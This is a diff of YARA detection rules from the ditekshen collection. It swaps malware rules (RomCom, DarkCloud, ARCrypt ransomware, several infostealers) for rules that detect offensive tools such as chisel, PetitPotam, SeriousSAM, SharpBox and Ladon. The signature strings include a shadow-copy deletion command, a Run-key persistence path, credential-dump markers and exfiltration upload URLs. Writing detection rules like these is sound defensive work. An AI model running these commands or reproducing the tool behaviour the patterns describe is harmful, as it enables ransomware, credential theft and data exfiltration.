-		logic_hash = "7aef88aa9f201c3a1852d63b17c14e44c7c2a7dfe94a9bc77897a4aa0eb97486"
+		logic_hash = "08c7b2c4725431c1bf85ae8068f4250c98e58890e3b4c97aa9e419e4f487cada"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
+	strings:
+		$s1 = "chisel-v" ascii
+		$s2 = "sendchisel-v" ascii
+		$s3 = "<-chiselclosedcookiedomainefenceempty" ascii
+		$ws1 = "Sec-WebSocket-Key" ascii
+		$ws2 = "Sec-WebSocket-Protocol" ascii
+		$ws3 = "Sec-Websocket-Version" ascii
+		$ws4 = "Sec-Websocket-Extensions" ascii
+
 	condition:
-		uint16( 0 ) == 0x5a4d and pe.is_dll ( ) and ( pe.exports ( "DllCanUnloadNow" ) and pe.exports ( "DllGetClassObject" ) and pe.exports ( "DllRegisterServer" ) and pe.exports ( "DllUnregisterServer" ) and pe.exports ( "GetProxyDllInfo" ) ) and for any fn in pe.export_details : ( fn.forward_name contains "Dll" )
+		uint16( 0 ) == 0x5a4d and ( 1 of ( $s* ) and 3 of ( $ws* ) )
 }
-
-rule DITEKSHEN_MALWARE_Win_Romcom_Worker : FILE
+rule DITEKSHEN_INDICATOR_TOOL_ANT_Sharpedrchecker : FILE
 {
 	meta:
-		description = "Hunt for RomCom worker"
-		author = "ditekShen"
-		id = "ce545a33-731c-5ecd-b02e-cedf24f75cc7"
+		description = "Detect SharpEDRChecke, C# Implementation of Invoke-EDRChecker"
+		author = "ditekSHen"
+		id = "c0b41787-b8b4-5aa7-b1f0-0a89dbebe45e"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10309-L10322"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L992-L1023"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "488db046458585882a4709438042b57e02d7dbc06483fdfdfc463a64ee8db203"
+		logic_hash = "77a26ff5298dddebc669d9b6c39905a48a86884cf98adebdf935b94c62d36ddc"
 		score = 75
 		quality = 48
 		tags = "FILE"
 
 	strings:
-		$s1 = "UpdateProcThreadAttribute" fullword ascii
-		$s2 = "WriteFile" fullword ascii
-		$s3 = "GetAdaptersAddresses" fullword ascii nocase
-		$s4 = /inflate\s\d+\.\d+\.\d+\sCopyright/ ascii
-		$s5 = "SetHandleInformation" fullword ascii
-		$s6 = "PeekNamedPipe" fullword ascii
+		$pdb1 = "\\SharpEDRChecker.pdb" fullword ascii
+		$x1 = "EDRData" fullword ascii
+		$x2 = "bytesNeeded" fullword ascii
+		$x3 = /\] Checking (Directories|drivers|processes|modules|Registry|Services) \[/ wide
+		$s1 = "CheckService" fullword ascii
+		$s2 = "CheckModule" fullword ascii
+		$s3 = "PrivCheck" fullword ascii
+		$s4 = "ServiceChecker" fullword ascii
+		$s5 = "PrivilegeChecker" fullword ascii
+		$s6 = "FileChecker" fullword ascii
+		$s7 = "DriverChecker" fullword ascii
+		$s8 = "ProcessChecker" fullword ascii
+		$s9 = "DirectoryChecker" fullword ascii
+		$s10 = "RegistryChecker" fullword ascii
+		$s11 = "CheckDriver" fullword ascii
+		$s12 = "CheckServices" fullword ascii
+		$s13 = "CheckDirectories" fullword ascii
+		$s14 = "CheckCurrentProcessModules" fullword ascii
+		$s15 = "CheckProcesses" fullword ascii
+		$s16 = "CheckDrivers" fullword ascii
+		$s17 = "CheckProcess" fullword ascii
+		$s18 = "CheckSubDirectory" fullword ascii
+		$s19 = "CheckDirectory" fullword ascii
+		$s20 = "CheckRegistry" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and pe.is_dll ( ) and pe.number_of_exports == 1 and pe.exports ( "Main" ) and all of them
+		uint16( 0 ) == 0x5a4d and ( all of ( $x* ) or 10 of ( $s* ) or ( 1 of ( $pdb* ) and ( 1 of ( $x* ) or 2 of ( $s* ) ) ) or ( #x3 > 4 and 2 of them ) )
 }
-
-rule DITEKSHEN_MALWARE_Win_Romcom_Dropper : FILE
+rule DITEKSHEN_INDICATOR_TOOL_ANT_Invizzzible : FILE
 {
 	meta:
-		description = "Hunt for RomCom worker"
-		author = "ditekShen"
-		id = "1b77122d-95d7-535d-897e-b542da17f499"
+		description = "Detect InviZzzible"
+		author = "ditekSHen"
+		id = "23533d1c-e0d8-51c8-ac18-60c845bff197"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10324-L10335"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1025-L1059"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "89f62f71e5870c1e5d14bc32dd3508da620f5fa85494251c69682eb09d630029"
+		logic_hash = "bd84015f9fdc160a6ed9010c5a5905fcf13987b1fdec6fdd9535e315dc3617e8"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 
 	strings:
-		$s1 = "\\REGISTRY\\MACHINE\\SOFTWARE\\Classes" wide nocase
-		$s2 = "\\REGISTRY\\USER" wide nocase
-		$s3 = "BINARY" fullword wide
-		$s4 = "POST" fullword wide
+		$s1 = "\\\\.\\pipe\\task_sched_se" fullword wide
+		$s2 = "\\\\\\.\\NPF_NdisWanIp" fullword wide
+		$s3 = /--action --(dtt|mra|user-input|cfg|dan|evt|pid|exc|wmi|tsh)/ fullword wide
+		$s4 = "cuckoo_%lu.ini" fullword wide
+		$s5 = "sandbox evasion" wide nocase
+		$s6 = "UnbalancedStack" fullword ascii
+		$s7 = "process_with_long_name" fullword ascii
+		$s8 = "DelaysAccumulation" fullword ascii
+		$s9 = "PidReuse" fullword ascii
+		$s10 = "DeadAnalyzer" fullword ascii
+		$s11 = "SleepDummyPatch" fullword ascii
+		$s12 = "AudioDeviceAbsence" fullword ascii
+		$s14 = "\\\\.\\PhysicalDrive%u" fullword ascii
+		$s15 = "\"countermeasures\":" ascii
+		$s16 = "_%.02u%.02u%.02u_%.02u%.02u%.02u.html" ascii
+		$f1 = ".?AVHyperV@SandboxEvasion@@" ascii
+		$f2 = ".?AVJoebox@SandboxEvasion@@" ascii
+		$f3 = ".?AVKVM@SandboxEvasion@@" ascii
+		$f4 = ".?AVMisc@SandboxEvasion@@" ascii
+		$f5 = ".?AVParallels@SandboxEvasion@@" ascii
+		$f6 = ".?AVQEMU@SandboxEvasion@@" ascii
+		$f7 = ".?AVSandboxie@SandboxEvasion@@" ascii
+		$f8 = ".?AVVBOX@SandboxEvasion@@" ascii
+		$f9 = ".?AVVirtualPC@SandboxEvasion@@" ascii
+		$f10 = ".?AVVMWare@SandboxEvasion@@" ascii
+		$f11 = ".?AVWine@SandboxEvasion@@" ascii
+		$f12 = ".?AVXen@SandboxEvasion@@" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and pe.is_dll ( ) and pe.number_of_exports == 1 and pe.exports ( "Main" ) and 3 of them
+		uint16( 0 ) == 0x5a4d and ( 6 of ( $s* ) or 4 of ( $f* ) or ( 2 of ( $f* ) and 2 of ( $s* ) ) )
 }
-
-rule DITEKSHEN_MALWARE_Win_STEALDEAL : FILE
+rule DITEKSHEN_INDICATOR_TOOL_EXFIL_Sharpbox : FILE
 {
 	meta:
-		description = "Hunt for STEALDEAL stealer"
-		author = "ditekShen"
-		id = "4685fea3-4050-5395-af2b-cb0ba4104b47"
+		description = "Detect SharpBox, C# tool for compressing, encrypting, and exfiltrating data to Dropbox using the Dropbox API"
+		author = "ditekSHen"
+		id = "cd834fe2-dc77-509d-a8f9-d631f395bcd8"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10337-L10348"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1061-L1080"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "366c33b06ed9403b2b840d98e25287333eb52f2588f747981b3c0c3baf4fd27a"
+		logic_hash = "b03ab3786b2a2e6774d94be4edf700a7154d8d400c7b2b31c73c68ce9fe0c08a"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
 
 	strings:
-		$x1 = "stealDll.dll" fullword ascii
-		$s1 = "SqlExec" fullword ascii
-		$s2 = "etilqs_" fullword ascii
-		$s3 = "SUBQUERY %u" fullword ascii
+		$s1 = "UploadData" fullword ascii
+		$s2 = "isAttached" fullword ascii
+		$s3 = "DecryptFile" fullword ascii
+		$s4 = "set_dbxPath" fullword ascii
+		$s5 = "set_dbxToken" fullword ascii
+		$s6 = "set_decrypt" fullword ascii
+		$s7 = "GeneratePass" fullword ascii
+		$s8 = "FileUploadToDropbox" fullword ascii
+		$s9 = "\\SharpBox.pdb" ascii
+		$s10 = "https://content.dropboxapi.com/2/files/upload" fullword wide
+		$s12 = "Dropbox-API-Arg: {\"path\":" wide
+		$s13 = "X509Certificate [{0}] Policy Error: '{1}'" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and pe.is_dll ( ) and pe.exports ( "stub" ) and ( 1 of ( $x* ) or all of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and 7 of them
 }
-rule DITEKSHEN_MALWARE_Win_Darkcloud : FILE
+rule DITEKSHEN_INDICATOR_TOOL_EXP_Serioussam01 : CVE_2021_36934 FILE
 {
 	meta:
-		description = "Detects DarkCloud infostealer"
+		description = "Detect tool variants potentially exploiting SeriousSAM / HiveNightmare CVE-2021-36934"
 		author = "ditekSHen"
-		id = "e29e1dc7-87b8-5d6b-b73b-460dc2530875"
+		id = "e8f24ae4-48fb-5ee7-9e8e-0d144bb3b046"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10350-L10371"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1082-L1104"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "7826cc4185d6edb760d062019e0fa30f800c34e5fb4b0eedcfb17081e6c7643d"
+		logic_hash = "8b9de87dc073e6ba3eb36dd57b31e9749849c2e277f2bcd1c98ffc2d02861e10"
 		score = 75
-		quality = 48
-		tags = "FILE"
+		quality = 25
+		tags = "CVE-2021-36934, FILE"
 
 	strings:
-		$x1 = "=DARKCLOUD=" wide
-		$x2 = "#DARKCLOUD#" wide
-		$x3 = "DARKCLOUD" wide
-		$s1 = "DC-Creds" fullword wide
-		$s2 = "shell.application" fullword wide
-		$s3 = "VBSQLite3.dll" ascii wide nocase
-		$s4 = "getbinaryvalue" fullword wide
-		$s5 = "sqlite_exec" fullword ascii
-		$i1 = "RegWrite" fullword wide
-		$i2 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" wide
-		$i3 = "\\Templates\\Stub\\Project" wide
-		$i4 = "\\Credentials" wide
-		$i5 = "SELECT " wide
-		$i6 = "\\163MailContacts.txt" fullword wide
+		$s1 = "VolumeShadowCopy" fullword wide
+		$s2 = "\\\\?\\GLOBALROOT\\Device\\" fullword wide
+		$s3 = "{0}\\{1}$:aad3b435b51404eeaad3b435b51404ee:{2}" fullword wide
+		$s4 = "ASPNET_WP_PASSWORD" fullword wide
+		$s5 = "<ParseSam>b__" ascii
+		$s6 = "<DumpSecret" ascii
+		$s7 = "<ParseSecret" ascii
+		$s8 = "LsaSecretBlob" fullword ascii
+		$s9 = "systemHive" fullword ascii
+		$s10 = "ImportHiveDump" fullword ascii
+		$s11 = "FindShadowVolumes" fullword ascii
+		$s12 = "GetBootKey" fullword ascii
+		$r1 = "[*] SAM" wide
+		$r2 = "[*] SYSTEM" wide
+		$r3 = "[*] SECURITY" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $x* ) and ( 3 of ( $s* ) or 3 of ( $i* ) ) ) or ( all of ( $s* ) and 1 of ( $i* ) ) or ( 4 of ( $s* ) and 4 of ( $i* ) ) )
+		uint16( 0 ) == 0x5a4d and ( 6 of ( $s* ) or ( all of ( $r* ) and 3 of ( $s* ) ) )
 }
-rule DITEKSHEN_MALWARE_Win_Arcrypt : FILE
+rule DITEKSHEN_INDICATOR_TOOL_EXP_Petitpotam01 : FILE
 {
 	meta:
-		description = "Detects ARCrypt / ChileLocker ransomware"
+		description = "Detect tool potentially exploiting/attempting PetitPotam"
 		author = "ditekSHen"
-		id = "a53bbae6-a321-549d-9d45-e1a408d08740"
+		id = "12d7b533-f477-5fbb-8b1f-1a93c9a63500"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10373-L10399"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1127-L1143"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "cc9fa68d093fdf9745a06beb28e29108cb2ba846122ce097ad892213b1edba25"
+		logic_hash = "37a9477b41560904e8874ecaf93eb2667b9450b5d42665677abc1442538f9000"
 		score = 75
 		quality = 50
 		tags = "FILE"
 
 	strings:
-		$c1 = "readme_for_unlock.txt" wide
-		$c2 = "vssadmin.exe delete shadows /all /quiet" wide
-		$c3 = "START /b \"\" cmd /c wmic /node:" wide
-		$c4 = "START /b \"\" cmd /c DEL \"" wide
-		$c5 = "process call create cmd /c START" wide
-		$c6 = "net config server /autodisconnect:" wide
-		$c7 = "/NOBREAK>NUL) ELSE (START /b \"\" cmd /c DEL \"%~f" ascii
-		$c8 = ":\\_ARC\\_WorkSolution\\cryptopp" ascii
-		$e1 = /\.crYpt([A-F]{0,1}(\d+)?)?/ fullword wide
-		$e2 = ".dnt___.crYpt" wide nocase
-		$s1 = "create_directory" fullword ascii
-		$s2 = "create_directories" fullword ascii
-		$s3 = "NoClose" fullword ascii
-		$s4 = "StartMenuLogOff" fullword ascii
-		$s5 = "NoLogOff" fullword ascii
-		$s6 = "DisableTaskMgr" fullword ascii
-		$s7 = "DisableChangePassword" fullword ascii
-		$s8 = "HideFastUserSwitching" fullword ascii
-		$s9 = "RemotePath" fullword ascii
+		$s1 = "\\pipe\\lsarpc" fullword wide
+		$s2 = "\\%s" fullword wide
+		$s3 = "ncacn_np" fullword wide
+		$s4 = /EfsRpc(OpenFileRaw|EncryptFileSrv|DecryptFileSrv|QueryUsersOnFile|QueryRecoveryAgents|RemoveUsersFromFile|AddUsersToFile)/ wide
+		$r1 = "RpcBindingFromStringBindingW" fullword ascii
+		$r2 = "RpcStringBindingComposeW" fullword ascii
+		$r3 = "RpcStringFreeW" fullword ascii
+		$r4 = "RPCRT4.dll" fullword ascii
+		$r5 = "NdrClientCall2" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 5 of ( $c* ) or 7 of ( $s* ) or ( 3 of ( $c* ) and 4 of ( $s* ) ) or ( 1 of ( $e* ) and ( 1 of ( $c* ) and 1 of ( $s* ) ) ) or ( all of ( $e* ) and ( 1 of ( $c* ) or 1 of ( $s* ) ) ) )
+		uint16( 0 ) == 0x5a4d and ( all of ( $s* ) and 4 of ( $r* ) )
 }
-rule DITEKSHEN_MALWARE_Win_Rootteamstealer : FILE
+rule DITEKSHEN_INDICATOR_TOOL_PET_Sharpstrike : FILE
 {
 	meta:
-		description = "Detects RootTeam infostealer"
+		description = "Detect SharpStrike post-exploitation tool written in C# that uses either CIM or WMI to query remote systems"
 		author = "ditekSHen"
-		id = "3b57ff3e-09cf-52be-ac7f-45ee832d70ab"
+		id = "00b36fce-3d84-51cf-a800-042d7484d78c"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10401-L10417"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1145-L1160"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "d1693865253067527d58c980653d550b55d022d5a394b88090a958e5d5818143"
+		logic_hash = "c479d85878d9f9659fc157f0c6706703af3748a8740df6a5090cddc720dd7661"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
 
 	strings:
-		$x1 = "RootTeamStl" ascii
-		$x2 = "Bot: https://t.me/rootteam_bot" ascii
-		$x3 = "rootteam_bot" ascii
-		$x4 = "Root Team" ascii
-		$s1 = "-ldflags=\"-s -w -H windowsgui -X" ascii
-		$s2 = "'RootTeamStl/vars." ascii
-		$s3 = "{ Hostname string \"json:\\\"hostname\\\"\"; EncryptedUsername string \"json:\\\"encryptedUsername\\\"\"; EncryptedPassword string \"json:\\\"encryptedPassword\\\"\" }" ascii
-		$s4 = "\\Program Files (x86)\\Steam\\config\\loginusers.vdf" ascii
-		$s5 = /RootTeamStl\/managers\/(browser|coldwallets|discord|filegrabber|steam|userinformation)?/ ascii
+		$x1 = "SharpStrike v" wide
+		$x2 = "[*] Agent is busy" wide
+		$x3 = "SharpStrike_Fody" fullword ascii
+		$s1 = "ServiceLayer.CIM" fullword ascii
+		$s2 = "Models.CIM" fullword ascii
+		$s3 = "<HandleCommand>b__" ascii
+		$s4 = "MemoryStream" fullword ascii
+		$s5 = "GetCommands" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 3 of ( $x* ) or ( 1 of ( $x* ) and 3 of ( $s* ) ) or 4 of ( $s* ) or 5 of them )
+		uint16( 0 ) == 0x5a4d and ( 2 of ( $x* ) or all of ( $s* ) )
 }
-rule DITEKSHEN_MALWARE_Win_Espioloader : FILE
+rule DITEKSHEN_INDICATOR_TOOL_LTM_Ladon : FILE
 {
 	meta:
-		description = "Detects Espio loader and obfuscator"
+		description = "Detect Ladon tool that assists in lateral movement across a network"
 		author = "ditekSHen"
-		id = "fb2be984-abd6-5f71-b448-d41c9c3e35c5"
+		id = "227e63ce-8383-5bb1-870e-6c4e767b402f"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10438-L10451"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1162-L1178"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "8ad77a50db48f12e6f6465652b24fc1daa56375bb27e37e0eead1bea55b89e0c"
+		logic_hash = "f31276bcbcae672966cfddc9af4f5b507d7244360b421de7fe1e811fb954fb7d"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
-		clamav_sig = "MALWARE.Win.EspioLoader"
 
 	strings:
-		$pdb = /\\loader\\x64\\(Release|Debug)\\Espio\.pdb/ ascii
-		$s1 = "obfuscatedPayload" fullword wide
-		$s2 = "OBFUSCATEDPAYLOAD" fullword wide
-		$s3 = "\\??\\C:\\Windows\\System32\\werfault.exe" fullword wide
-		$s4 = "C:\\windows\\system32\\ntdll.dll" fullword ascii
+		$d1 = "Ladon.VncSharp.dll" fullword ascii
+		$d2 = "Ladon.Renci.SshNet.dll" fullword ascii
+		$s1 = "Ladon." ascii
+		$s2 = "nowPos" fullword ascii
+		$s3 = "Scan" fullword ascii
+		$s4 = "QLZ_STREAMING_BUFFER" fullword ascii
+		$s5 = "sizeDecompressed" fullword ascii
+		$s6 = "UpdateByte" fullword ascii
+		$s7 = "kNumBitPriceShiftBits" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( $pdb or 3 of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and ( all of ( $d* ) or all of ( $s* ) or ( 1 of ( $d* ) and 5 of ( $s* ) ) )
 }
-rule DITEKSHEN_MALWARE_Win_Celestybinderloader : FILE
+rule DITEKSHEN_INDICATOR_TOOL_LTM_Ladonexp : FILE
 {
 	meta:
-		description = "Detects Celesty Binder loader"
+		description = "Detect Ladon tool that assists in lateral movement across a network"
 		author = "ditekSHen"
-		id = "9c3404b7-311c-565d-b0fa-cfa80ba97289"
+		id = "bd1e7ef5-ae68-5e0d-8261-0eb765453bae"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10453-L10466"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1180-L1191"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "8c9ffd48c9c8cd345dccfb48bcb345282f9978f7cf906a61e2ea81c48486b16d"
+		logic_hash = "22f6a717b8464bddd850bb5ea8b416e99bceb91fe917f188be178f2fff620730"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$s1 = "\\DarkCoderSc\\Desktop\\Celesty Binder\\Stub\\STATIC\\Stub.pdb" ascii
-		$s2 = "DROPIN" fullword ascii wide
-		$s3 = "EXEC" fullword ascii wide
-		$s4 = "RBIND" fullword ascii wide
-		$s5 = "%LAPPDATA%" fullword ascii wide
-		$s6 = "%USERDIR%" fullword ascii wide
+		$s1 = "txt_cscandll.Text" fullword wide
+		$s2 = "CscanWebExpBuild.frmMain.resources" fullword ascii
+		$s3 = "= \"$HttpXforwardedFor$\";" ascii
+		$s4 = "namespace netscan" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		uint16( 0 ) == 0x5a4d and 3 of them
 }
-rule DITEKSHEN_MALWARE_Win_Blitzgrabber : FILE
+rule DITEKSHEN_INDICATOR_TOOL_LTM_Ladongo : FILE
 {
 	meta:
-		description = "Detects BlitzGrabber infostealer"
+		description = "Detect LadonGo tool that assists in lateral movement across a network"
 		author = "ditekSHen"
-		id = "4240527e-c2f8-5424-986a-c1616fafb9bb"
+		id = "4dbf7f24-b9ab-5629-8e78-667d9623dea9"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10468-L10487"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1193-L1207"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "8baceacf3c2af61e00b31e8106820b6f1ce2e7a9d98eaed965e698109ae08314"
+		logic_hash = "606172b8fb251cb4ad75de40b55d74779aef6409832f6edf09068083143ec749"
 		score = 75
-		quality = 46
+		quality = 75
 		tags = "FILE"
 
 	strings:
-		$x1 = "**BLITZED GRABBER V" wide
-		$x2 = "\\BlitzedGrabberV" ascii
-		$x3 = "Kyanite" ascii wide nocase
-		$s1 = /;\/\/(SCREENSHOT|PASSWORDS|FORKBOMB|MELTSTUB)\/\// ascii wide
-		$s2 = "KryptedWare" wide
-		$s3 = "chckcopyTemp" wide
-		$s4 = "chckscreenShot" wide
-		$s5 = "Plugin.Banking." ascii
-		$s6 = "sChromiumPswPaths" ascii
-		$s7 = ".CreateDownloadLink(" ascii
-		$s8 = "CaptureScreen()" ascii
-		$s9 = ".UploadFile(\"https://api.anonfiles.com/upload\"" ascii
+		$f1 = "main.VulDetection" fullword ascii
+		$f2 = "main.BruteFor" fullword ascii
+		$f3 = "main.RemoteExec" fullword ascii
+		$f4 = "main.Exploit" fullword ascii
+		$f5 = "main.Noping" fullword ascii
+		$f6 = "main.LadonScan" fullword ascii
+		$f7 = "main.LadonUrlScan" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 1 of ( $x* ) and 3 of ( $s* ) ) or ( 7 of ( $s* ) )
+		( uint16( 0 ) == 0x5a4d or uint16( 0 ) == 0x457f or uint16( 0 ) == 0xface ) and 5 of ( $f* )
 }
-rule DITEKSHEN_MALWARE_Win_Bagle : FILE
+rule DITEKSHEN_INDICATOR_TOOL_ENC_Diskcryptor : FILE
 {
 	meta:
-		description = "Detect Bagle / Beagle email worm"
+		description = "Detect DiskCryptor open encryption solution that offers encryption of all disk partitions"
 		author = "ditekSHen"
-		id = "32632bdf-6cf5-5542-8e1f-70686139a465"
+		id = "22b25d5c-d67f-53ac-9ae8-2de077afdda9"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10489-L10505"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1209-L1232"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "4c3a09f10c792de1ab25001da29ea2fee84c583d49d9a5225817644aabde2dea"
+		logic_hash = "7ef0bf3b11f7e4055908518ce5b6a49e04d7002ebc3396fd2da32b4e13cf68e0"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$s1 = "SOFTWARE\\DateTime" fullword ascii
-		$s2 = "%s?p=%lu" fullword ascii
-		$s3 = "-upd" ascii
-		$s4 = "[%RAND%]" fullword ascii
-		$s5 = "MAIL FROM:<%s>" fullword ascii
-		$s6 = "RCPT TO:<%s>" fullword ascii
-		$s7 = "Message-ID: <%s%s>" fullword ascii
-		$s8 = "Content-Disposition: attachment; filename=\"%s%s\"" fullword ascii
-		$s9 = "http://www.%s" fullword ascii
+		$x1 = "\\DiskCryptor\\DCrypt\\" ascii
+		$s1 = "Error getting %sbootloader configuration" fullword wide
+		$s2 = "loader.iso" fullword wide
+		$s3 = "Bootloader config for [%s]" fullword wide
+		$s4 = "dc_get_mbr_config" fullword ascii
+		$s5 = "dc_encrypt_iso_image" fullword ascii
+		$s6 = "dc_start_re_encrypt" fullword ascii
+		$s7 = "dc_start_encrypt" fullword ascii
+		$s8 = "_w10_reflect_" ascii
+		$d1 = "\\DosDevices\\dcrypt" fullword wide
+		$d2 = "$dcsys$_fail_%x" fullword wide
+		$d3 = "%s\\$DC_TRIM_%x$" fullword wide
+		$d4 = "\\Device\\dcrypt" fullword wide
+		$d5 = "%s\\$dcsys$" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 8 of them
+		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $x* ) and 2 of ( $s* ) ) or 4 of ( $s* ) or 3 of ( $d* ) )
 }
-rule DITEKSHEN_MALWARE_Win_Ragestealer : FILE
+rule DITEKSHEN_INDICATOR_TOOL_PRI_Installerfiletakeover : CVE_2021_41379 FILE
 {
 	meta:
-		description = "Detect Rage / Priv8 infostealer"
-		author = "ditekShen"
-		id = "dfc1abaa-d975-5e6a-ad4d-344031b0c40c"
+		description = "Detect InstallerFileTakeOver CVE-2021-41379"
+		author = "ditekSHen"
+		id = "8581a306-e6d3-5ac1-a778-76c6505ee174"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10507-L10522"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1234-L1253"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a26b86845bcd62d4a360a8dae9cfa56b5d96ebc521f224c18a01cc0a2bd958e9"
+		logic_hash = "0a9e53138d33494d9b2aa0271b877e405ea2e8accba7c6eeac547caaa7a7c2ea"
 		score = 75
-		quality = 75
-		tags = "FILE"
+		quality = 50
+		tags = "CVE-2021-41379, FILE"
 
 	strings:
-		$x1 = "\\RageStealer\\obj\\" ascii
-		$x2 = "Priv8 Stealer" wide
-		$s1 = "\\Screen.png" wide
-		$s2 = "Content-Disposition: form-data; name=\"document\"; filename=\"{1}\"" wide
-		$s3 = "NEW LOG FROM" wide
-		$s4 = "GRABBED SOFTWARE" wide
